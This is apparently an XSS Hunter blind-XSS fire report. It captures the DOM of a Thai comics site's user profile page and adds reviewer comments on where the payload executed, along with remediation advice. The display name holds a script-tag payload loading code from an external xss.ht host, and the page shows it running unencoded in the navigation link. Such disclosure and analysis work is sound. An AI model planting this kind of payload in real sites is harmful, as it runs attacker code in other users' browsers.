            </div>
        </div>
        <div id="oc-content" class="oc-content-margin-bottom">
            <input type="hidden" id="env" value="Production">
            <style>
    .center-cropped {
        background-position: center center;
        background-repeat: no-repeat;
    }
</style>
<input id="isLogin" type="hidden" data-islogin="True">
<!-- Profile sub-navigation: the owner link (avatar plus display name) followed by the profile / portfolio / dashboard tabs, rendered twice for the oc-hidden-md-down and oc-hidden-lg-up layouts. -->
<div class="oc-sub-navbar">
    <div class="oc-hidden-md-down nav-extra-layout">
        <div class="oc-container">
            <div class="ui padded grid">
                <div class="column head-menu">
                    <div class="head-item oc-text-single-line">
                        <!-- Review note: in the title attribute below, the display name's double quote is serialized as &quot; so the payload stays inside the attribute value and does not break out. -->
                        <a class="single-line" title="&quot;><script src=https://enwuft.xss.ht></script>" href="/User/ProfileById?userid=20559376">
                            <!-- Review note: the style value below has url( without a closing parenthesis; the user's image URL is placed into CSS unquoted here. -->
                            <div class="menu-icon avartar" style="background-image: url(https://image.wecomics.in.th/user/20559376/637143143238075104.jpg?w=300">
                                <img class="link-profile-avatar" src="/images/icon/tranparent/20x20.png?v=lNCszvPpVSa1-tKJJhLFoLdEjDCgbZu78B9gkptv-lA">
                            </div>
                            <!-- Review note: this is the sink that fired. The display name shows up as a short text node followed by a real, parsed script element (the serializer has added quotes around src), so the name reached this element body without HTML encoding. The same name is entity-encoded in the title-profile heading further down the page. This dump is the DOM after execution, so it does not show whether the unencoded write happens in the server template or in client script; confirm before patching. -->
                            "&gt;<script src="https://enwuft.xss.ht"></script>
                        </a>
                    </div>
                </div>
                <div class="column active">
                    <a title="โปรไฟล์" href="/profile/20559376/script-src-https-enwuft-xss-ht-script">
                        โปรไฟล์
                    </a>
                </div>
                <div class="column">
                    <a title="การ์ตูน" href="/portfolio/comics/20559376/script-src-https-enwuft-xss-ht-script">
                        ผลงาน
                    </a>
                </div>
                    <div class="column">
                        <a title="โปรไฟล์" href="/dashboard/20559376/script-src-https-enwuft-xss-ht-script">
                            ระบบสนับสนุน
                        </a>
                    </div>
            </div>
        </div>
    </div>
    <div class="oc-hidden-lg-up nav-normal-layout">
        <div class="oc-container">
            <div class="ui equal width padded grid">
                <div class="column active">
                    <a title="โปรไฟล์" href="/profile/20559376/script-src-https-enwuft-xss-ht-script">
                        โปรไฟล์
                    </a>
                </div>
                <div class="column">
                    <a title="การ์ตูน" href="/portfolio/comics/20559376/script-src-https-enwuft-xss-ht-script">
                        ผลงาน
                    </a>
                </div>
                    <div class="column">
                        <a title="โปรไฟล์" href="/dashboard/20559376/script-src-https-enwuft-xss-ht-script">
                            ระบบสนับสนุน
                        </a>
                    </div>
            </div>
        </div>
    </div>
</div>
<div class="oc-content">
    <div class="oc-container oc-segment">
        <div class="ui centered grid">
            <div class="column thirteen wide computer sixteen wide tablet sixteen wide mobile">
                <div class="user-profile center-cropped" style="background-image: url('https://image.wecomics.in.th/user/20559376/cover-637143144902058587.png');background-color:#3f3f3f;background-position: center center;background-size: 100% auto;">
                    <div class="ui two column center aligned grid">
                        <div class="column oc-padding-0em" style="width:30%;display: flex;justify-content: center;">
                            <div class="avartar avatar-profile lazy lazy-loader" data-src="https://image.wecomics.in.th/user/20559376/637143143238075104.jpg">
                                <img src="/images/icon/tranparent/20x20.png">
                            </div>
                        </div>
                        <!-- Profile header text column: numeric user id and the display name. -->
                        <div class="column" style="width:70%;align-self: center">
                            <div class="oc-text-left id-profile font-wight-300" style="color:white">
                                ID : 20559376
                            </div>
                            <div class="title oc-text-single-line title-profile" style="color:white!important;text-align:left!important">
                                <!-- Review note: here the display name is entity-encoded (&lt; and &gt;), so the browser shows it as text. This is the correctly encoded rendering of the same value that executes elsewhere in this DOM, which points at one unencoded sink rather than missing input filtering. -->
                                "&gt;&lt;script src=https://enwuft.xss.ht&gt;&lt;/script&gt;
                            </div>

                        </div>
                    </div>
                    <div class="ui centered grid">
                        <div class="column seven wide computer sixteen wide tablet sixteen wide mobile oc-padding-0em">
                            <div class="oc-text-center">
                                    <div class="profile-wallet" id="profile-wallet">
                                        <div class="coin profile-wallet-coin">
                                            <img class="icon" src="/images/icon/pang-coin.png?v=TXNvuXNJux3pBRU2m8tafA62TgUw3EtEEESZdmI3TR4" alt="">
                                            <span class="value">0</span>
                                            <a href="/payment/topup" title="เติมเหรียญ">
                                                <img class="icon plus" src="/images/icon/plus-gray.png?v=mztoSexWYCjVNPGNMUUvpCQEs4iIj47sSXeutFZNrmo" alt="">
                                            </a>
                                        </div>
                                        <div class="key profile-wallet-key">
                                            <img class="icon" src="/images/icon/pang-key.png?v=eOEeXrGBFAHonmXJL2JI82Ushad7Bh1hzIzp_UfNrYo" alt="">
                                            <span class="value">0</span>
                                        </div>
                                    </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="oc-text-center">
                        <a class="text-orange" href="/user/settings/profile">
                            <div class="oc-button-comics-color fluit">แก้ไขโปรไฟล์</div>
                        </a>
                </div>
                <div class="oc-text-center oc-padding-1em " style="color:#d4d4d5;padding-bottom:0em!important">
                    เข้าร่วม September 10, 2019
                </div>
            </div>
            <div class="column thirteen wide computer sixteen wide tablet sixteen wide mobile">
                <div class="user-content">
                    <div class="ui grid">
                        <div class="column computer tablet sixteen wide mobile">
                            <div class="detail">
                                <div class="follow">
                                    <a class="followers" href="/user/20559376/followers">
                                        <span class="number follow-count">0</span> ผู้ติดตาม
                                    </a>
                                    <a class="followings" href="/user/20559376/followings">
                                        <span class="number">0</span> กำลังติดตาม
                                    </a>
                                </div>
                                <div class="description">
                                    
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="user-ownership">

                    <div class="comic oc-hidden">
                        <div class="header oc-padding-bottom-0em">
                            ชั้นหนังสือ (0)
                        </div>
                        <div class="subheader">
                        </div>
                        <div class="content">
                        </div>
                    </div>
                </div>
                <div class="user-comment comment-section" data-id="20559376" data-type="users" data-count-comment="0">
                    <div class="ui mini modal modal-comment-delete">
    <div class="header">
        ยืนยันที่จะลบ
    </div>
    <div class="content">
        <p>ข้อมูลจะถูกนำออกทำให้ไม่สามารถอ่านได้อีกน่าเสียดายมากเลย</p>
        <p>แน่ใจแล้วหรือที่ต้องการลบข้อมูลออก<br>หากยืนยันแล้วจะไม่สามารถกู้คืนมาได้อีกนะ!</p>
    </div>
    <div class="actions">
        <div class="ui approve button red">ยืนยันที่จะลบ</div>
        <div class="ui cancel button">ยกเลิก</div>
    </div>
</div>
<!-- Comment entry box: the viewer's avatar, a text input and a send button. -->
<div class="comment-box">
    <div class="comment-input">
        <div class="comment-avatar profile avartar" style="background-image: url(&quot;https://image.wecomics.in.th/user/20559376/637143143238075104.jpg?w=300&quot;);">
            <a href="javascript:;">
                <img src="/images/icon/tranparent/20x20.png?v=lNCszvPpVSa1-tKJJhLFoLdEjDCgbZu78B9gkptv-lA">
            </a>
        </div>
        <div class="ui fluid action input">
            <!-- Review note: maxlength is enforced by the browser only. Comments are a second user-controlled value shown on this page, so the length limit and output encoding need to be checked where comments are stored and rendered; that code is not part of this dump. -->
            <input class="message" type="text" placeholder="พิมพ์ข้อความ..." maxlength="500">
            <div class="ui button">ส่ง</div>
        </div>
    </div>
</div>
<div class="comment-box">
    <div class="comment-title">
        ความคิดเห็น (<span class="counter-comment">0</span>)
    </div>
    <div class="comment-container" style="display: none;">
        <ul id="comment-list" class="comment-list">
        </ul>
        <button class="fluid big ui button hide oc-button color-e comment-load-more" data-id="20559376" data-offset="0" data-length="10" style="display: none;">โหลดเพิ่มเติม</button>
    </div>
    <div class="data-not-found" style="display: block;">
        <div class="oc-notfound">
</div>

    </div>
</div>

                </div>
            </div>
        </div>
    </div>
</div>
<input id="userId" type="hidden" value="20559376">

        </div>
        <!-- Site footer: social links, policy links, the Trustmarkthai certificate banner and the copyright line. -->
        <footer id="oc-footer">
            <div class="oc-footer oc-hidden-sm-down">
                <div class="ui container equal width grid">
                    <div class="middle aligned row">
                        <div class="left floated left aligned sixteen wide mobile ten wide tablet eight wide computer eight wide widescreen column oc-padding-left-0em">
                            <p class="social-us">
                                <span class="text">
                                    ติดตามเราได้ที่
                                </span>
                                <a href="https://www.facebook.com/wecomicsTH/"><img class="ui middle aligned mini image icon" src="/images/icon/iconSocial.png?v=ru8x_lt2-ka2GbeGwDA5a5z4vwEuzYBxljhfvpoaVv8" alt="social"></a>
                                <a href="https://twitter.com/WeComicsTH"><img class="ui middle aligned mini image icon" src="/images/icon/iconSocial-1.png?v=iz4h3NCvdLsgfPnQxn7AFX8J9JtuTaVb4AT6TyHZ8wo" alt="social"></a>
                                <a href="https://www.youtube.com/channel/UCDe0apC-kUpfcnHlzDfNlPg"><img class="ui middle aligned mini image icon" src="/images/icon/iconSocial-2.png?v=cxmIImTzkXlnlbOdn9ACphuyOsbAqT9vo5y_FuFIPUU" alt="social"></a>
                                <a href="https://www.instagram.com/wecomicsTH"><img class="ui middle aligned mini image icon" src="/images/icon/iconSocial-7.png?v=bZhG2yVnivPeJjF2zXBafDW1d6uB6aOZge-7ejab2q4" alt="social"></a>
                            </p>
                            <p class="link-text">
                                <a class="word-break" href="/privacy-policy">นโยบายความเป็นส่วนตัว</a> |
                                <a class="word-break" href="/terms-of-use">ข้อกำหนดการใช้งาน</a> |
                                <a class="word-break" href="/faq">คำถามที่พบบ่อย</a>
                            </p>

                        </div>
                        <div class="right floated right aligned sixteen wide mobile six wide tablet eight wide computer eight wide widescreen column oc-padding-right-0em">
                            <!-- Review note: the script on the next line is loaded from a third-party host with no integrity attribute and runs with this page's origin privileges on an authenticated profile page. The banner markup that follows it uses an inline onclick handler and a javascript: href (presumably inserted by that script; confirm), which a strict Content Security Policy would have to allow or the banner would need to be rebuilt without inline handlers. -->
                            <script src="https://www.trustmarkthai.com/callbackData/initialize.js?t=835d-27-5-b5c65a5a2599aec4fc072bf78071737abba316811" id="dbd-init"></script><div id="Certificate-banners"><a title="กรมพัฒนาธุรกิจการค้า Trustmarkthai" style="padding-left: 5px;" href="javascript:void(0);" onclick="open_popup(&quot;https://www.trustmarkthai.com/callbackData/popup.php?data=835d-27-5-b5c65a5a2599aec4fc072bf78071737abba316811&amp;markID=firstmark&quot;);"><img alt="กรมพัฒนาธุรกิจการค้า Trustmarkthai" src="https://www.trustmarkthai.com//trust_banners/bns_registered.png"></a>
</div>
                            <p class="copyright-text">สงวนลิขสิทธิ์ <i class="copyright icon oc-margin-0em" style="font-size:0.7em;"></i> บริษัท วีคอมมิคส์ จำกัด</p>
                        </div>
                    </div>
                </div>
            </div>
            <style>
                .cover-img-footer-mobile {
                    position: relative;
                }

                .download-app-mobile {
                    position: absolute;
                    bottom: 8px;
                    right: 16px;
                }

                .icon-size-footer {
                    width: 40%;
                }
            </style>
            <!--Footter mobile-->
        </footer>
    </div>
    
    
        
    
    
        <link href="/css/components/profile.min.css?v=4l4SdbJdSQnxHhK77Kb7Z4d0h2RFN3lS4hqpI0Q4-uc" rel="stylesheet">
    

        <!-- Page scripts: a passive-events shim, the image-map resizer and its init call, then the site, timeago locale, jsrender and profile bundles. -->
        <!-- Review note: the unpkg URL on the next line names no package version and has no integrity attribute, so the code that executes here can change whenever a new release is published. Pinning an exact version with integrity and crossorigin, or serving a reviewed copy from this origin like the other bundles, removes that dependency on the CDN. -->
        <script type="text/javascript" src="https://unpkg.com/default-passive-events"></script>
        <script type="text/javascript" src="/js/lib/imageMapResizer.min.js?v=DR186bOg2VbFxLleTdmTjlKktKhP08AHo08h480JZCA"></script>
        <script type="text/javascript">
            $('map').imageMapResize();
        </script>
        <script src="/js/site.min.js?v=DdhYSkPBQPB7rkGS4LFIr9wW6g7hwRM09qUPJvSdJ1M"></script>
        <script src="/lib/timeago/locales/jquery.timeago.th.js?v=46n3qedBEqGuzik19o4y-df2AfnKzVleB4qCoUu1J1k"></script>
        
    
    
        <script src="/lib/jsrender/jsrender.min.js?v=7Vqjxcqfhed43wX6gmakQyMQ6Ha-pARsHDhwPJhfGN0"></script>

        <script src="/js/users/profile.min.js?v=lDXTVF_n53iLvcKec2rzShjJUunEIFqJ-ed8Td7Oe9s"></script>
    

    


<iframe width="1366" height="675" scrolling="no" style="visibility: hidden; position: absolute; top: -10000px; left: -10000px;"></iframe></body></html>
Injection Point (Raw HTTP Request)
Could not correlate XSS payload fire with request!
Origin

https://www.wecomics.in.th

HTML5 Canvas-Rendered Screenshot

https://api.xsshunter.com/uploads/xsshunter_screenshot_a04bbc1b3cfc31543a7015e397fd8eb0ac7733fc161a37f8e0ffa0c5158aa76d2d217dfb7fbf0daa796295bbddfc8ff39755865bf2fe1fe776c0fbd88307975f722a297da7cb9d48357218fbfde233cb7a49620ee6a764ec7710912c78a1319ec307d0d1.png

Injection Timestamp

1578717955

Remediation

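For more information about Cross-site Scripting and remediation of the issue, see the following resources (the resource links are missing from this copy of the report). In the DOM captured above, the profile display name is HTML-encoded in the profile heading but reaches the sub-navigation link body as live markup, so remediation starts with context-aware output encoding of the display name at that sink; marking cookies that scripts do not need to read as HttpOnly and deploying a Content Security Policy limit the impact of any sink that is missed.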

This report was generated by the service hosted at XSSHunter.com.